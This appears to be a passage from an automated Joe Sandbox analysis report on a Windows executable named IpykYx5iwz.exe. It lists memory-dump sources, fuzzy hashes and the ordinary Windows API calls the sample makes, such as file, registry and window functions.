                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c3edf1685a731033d4d486edf49746b27e37c98c567ee1d4a32c95863af533a7
                                                  • Instruction ID: 090b0d4ea1aa0bf32c33cfea42ca504b17bc5dd94af43198fda2cf7b81042a45
                                                  • Opcode Fuzzy Hash: c3edf1685a731033d4d486edf49746b27e37c98c567ee1d4a32c95863af533a7
                                                  • Instruction Fuzzy Hash: 0B911070D00229CBDF28CF98C8987ADBBB1FB44305F15816ED856BB281C7785A86DF44
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f165648cebe51b97b8fa21a057af4a98adee68f3e51c059ceaee69b9ffb5e66
                                                  • Instruction ID: 9fff5468755916abca62c5e968c05a7427fefad9d8c85ea6c4cb17611be317d2
                                                  • Opcode Fuzzy Hash: 6f165648cebe51b97b8fa21a057af4a98adee68f3e51c059ceaee69b9ffb5e66
                                                  • Instruction Fuzzy Hash: 50815471D04228CFDF24CFA8C8887ADBBB1FB45305F25816AD416BB281C7389A86DF55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0d67c6518609d5e00a62046a112786c6b5fbb9729b770c638d48e29420064bd6
                                                  • Instruction ID: ce274397434e12883866e7d5aca5d494dd0bd3f11d15aed25330077a73a38ecb
                                                  • Opcode Fuzzy Hash: 0d67c6518609d5e00a62046a112786c6b5fbb9729b770c638d48e29420064bd6
                                                  • Instruction Fuzzy Hash: 91816671D04228CBDF24CFA8C8447AEBBB1FB44305F25816AD456BB281C7785A86DF45
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2ce1ceaa73ead359ac10e83597be1970d5d6bbca98428d55bd536cf2d4baa15
                                                  • Instruction ID: 712327b4ba360f9873406890bfa66a7551055db31e5b4cf32af7873ce0627a0f
                                                  • Opcode Fuzzy Hash: b2ce1ceaa73ead359ac10e83597be1970d5d6bbca98428d55bd536cf2d4baa15
                                                  • Instruction Fuzzy Hash: D9714271D00228CFDF24CFA8C894BADBBB1FB48305F15816AD816BB281C7385A96DF54
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40be080613c1b9c7abc76cf02da527289f47aa3f0911e0de5f4ec916e65458b0
                                                  • Instruction ID: c0b605097b164116130eca60b1ab140e50dfbcee6288daaa4b45a2748c60fc6f
                                                  • Opcode Fuzzy Hash: 40be080613c1b9c7abc76cf02da527289f47aa3f0911e0de5f4ec916e65458b0
                                                  • Instruction Fuzzy Hash: 01713271E00228CBDF28CFA8C894BADBBB1FB44305F15816ED416BB281C7785A96DF55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 309353bbd672333c74c16a5bae7a6361c4845a3c3dc75abb0db9845a650d995f
                                                  • Instruction ID: df23799fdaa3b0d09e183135811d5b6505fb0232db5b531e6c94311c9a263d3d
                                                  • Opcode Fuzzy Hash: 309353bbd672333c74c16a5bae7a6361c4845a3c3dc75abb0db9845a650d995f
                                                  • Instruction Fuzzy Hash: E9713271D00228CBDF28CF98C894BADBBB1FB44305F15816ED456BB281C7785A96DF45
                                                  APIs
                                                    • Part of subcall function 00406444: FindFirstFileA.KERNELBASE(74DF3410,00422580,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,00405C0A,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,C:\Users\user\AppData\Local\Temp\nsz7B51.tmp,74DF3410,?,74DF2EE0,00405929,?,74DF3410,74DF2EE0), ref: 0040644F
                                                    • Part of subcall function 00406444: FindClose.KERNEL32(00000000), ref: 0040645B
                                                  • lstrlenA.KERNEL32 ref: 004022F2
                                                  • lstrlenA.KERNEL32(00000000), ref: 004022FC
                                                  • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402324
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: FileFindlstrlen$CloseFirstOperation
                                                  • String ID:
                                                  • API String ID: 1486964399-0
                                                  • Opcode ID: 4174c3bd40d337440defe0f5e29d48f5a1345860c7b310d651bf55423c86e276
                                                  • Instruction ID: 89f0f33848aa91cfff15a1f14c00ba247df3d091a9b87d06c6d493ced92827b6
                                                  • Opcode Fuzzy Hash: 4174c3bd40d337440defe0f5e29d48f5a1345860c7b310d651bf55423c86e276
                                                  • Instruction Fuzzy Hash: 55113C71904308AACB00EFF98A49A9EBBF9EF04318F11417FA515FB2C2D6B8C541CB59
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00403061,000000FF,00000000,00000000,0040A130,?), ref: 004030DA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 7b47499b20b7e0eb4373016da4b9a781a902caa6bff9f154131303d20151f790
                                                  • Instruction ID: 8877ead6e8c69a3a66606c491d636c96e1969607261919898ffcb404bfb58159
                                                  • Opcode Fuzzy Hash: 7b47499b20b7e0eb4373016da4b9a781a902caa6bff9f154131303d20151f790
                                                  • Instruction Fuzzy Hash: 95318230200219FFDB109F95DD44ADA3FA8EF09355F14813AF905EA1D0D738DA55DBA9
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 2159a8d9d6e65358a4161211ef1f590ae05e96406b910f9160f8c9bc7d0c6a2b
                                                  • Instruction ID: 311c0974f443c70014e78c9ea796c64afcef844d2d6d055f15de617139823c28
                                                  • Opcode Fuzzy Hash: 2159a8d9d6e65358a4161211ef1f590ae05e96406b910f9160f8c9bc7d0c6a2b
                                                  • Instruction Fuzzy Hash: BB01F431B202109BE7194B389E05B2A36A8E710315F51823FF951F65F1D778CC038B4C
                                                  APIs
                                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402409
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402412
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CloseDeleteValue
                                                  • String ID:
                                                  • API String ID: 2831762973-0
                                                  • Opcode ID: e0b28e9c8ac8b77ab35856a8c1314002fd8091bc2f13caf3de4c7febb99b0951
                                                  • Instruction ID: b0cec607119adc8cffd5a830a54634e929a7e060f3ed9e07a281962f4218e759
                                                  • Opcode Fuzzy Hash: e0b28e9c8ac8b77ab35856a8c1314002fd8091bc2f13caf3de4c7febb99b0951
                                                  • Instruction Fuzzy Hash: 11F0BB32A001209BD701AFB89B4DBAE72E9EB54315F16017FF502B72C1D6F85E01876D
                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401EAD
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401EB8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: Window$EnableShow
                                                  • String ID:
                                                  • API String ID: 1136574915-0
                                                  • Opcode ID: fe1b4b3cb0f382fbfc48822360631ae8afeaad143f9a7bbb39b70e3327b65116
                                                  • Instruction ID: 4a629b0aaa3be5249734218c61b48fc5c6e6f5ce39cae6bb6fe68cf9429d748b
                                                  • Opcode Fuzzy Hash: fe1b4b3cb0f382fbfc48822360631ae8afeaad143f9a7bbb39b70e3327b65116
                                                  • Instruction Fuzzy Hash: 9BE01272A04210DFD715DFA8AA859AE77B4FB84325F11093BE102F11D1D7B45841966D
                                                  APIs
                                                  • ShowWindow.USER32(00000000), ref: 00401581
                                                  • ShowWindow.USER32(00010456), ref: 00401596
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow
                                                  • String ID:
                                                  • API String ID: 1268545403-0
                                                  • Opcode ID: 8000dae284af2ad838ec12f8c7506c0521177000968a2beca575aea3bd43856e
                                                  • Instruction ID: 4470023cb5816ce10f16f0634b3dbbadf6695934031e428a0ae7f0cf7c19a842
                                                  • Opcode Fuzzy Hash: 8000dae284af2ad838ec12f8c7506c0521177000968a2beca575aea3bd43856e
                                                  • Instruction Fuzzy Hash: DDE0E676B101149BC725CF58EE9087E73BAEB94311751053FE502F3690C6B99D458B58
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,?,004033F7,0000000A), ref: 004064EB
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406506
                                                    • Part of subcall function 0040646B: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406482
                                                    • Part of subcall function 0040646B: wsprintfA.USER32 ref: 004064BB
                                                    • Part of subcall function 0040646B: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064CF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: 7c71ba34a6a15a08903817672089decd904bf369f5f8bc3590889e9149a18620
                                                  • Instruction ID: 24fce0d07730d2b83aa8b6d9be68f80c4376d605e597938b653f22d9b8a4cb61
                                                  • Opcode Fuzzy Hash: 7c71ba34a6a15a08903817672089decd904bf369f5f8bc3590889e9149a18620
                                                  • Instruction Fuzzy Hash: 77E0863260421067D2106B745E0482773A89FC4700302483EF946F2144DB38DC76AA6D
                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(00000003,00402E57,C:\Users\user\Desktop\IpykYx5iwz.exe,80000000,00000003), ref: 00405CDE
                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D00
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
                                                  • Instruction ID: 44ec1511c7d75563636feacf23b0872b92cf9f9cc06fc18b7ec6e669f43cef59
                                                  • Opcode Fuzzy Hash: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
                                                  • Instruction Fuzzy Hash: E4D09E71654201AFEF098F20DE16F2EBAA2EB84B00F11952CB682944E1DA715819AB19
                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,00000000,00403377,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403596,?,00000006,00000008,0000000A), ref: 004057B1
                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004057BF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
                                                  • Instruction ID: f4356607e3dcfc3587ce77828b4c105ca85d8a37fee652994368300620bd2749
                                                  • Opcode Fuzzy Hash: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
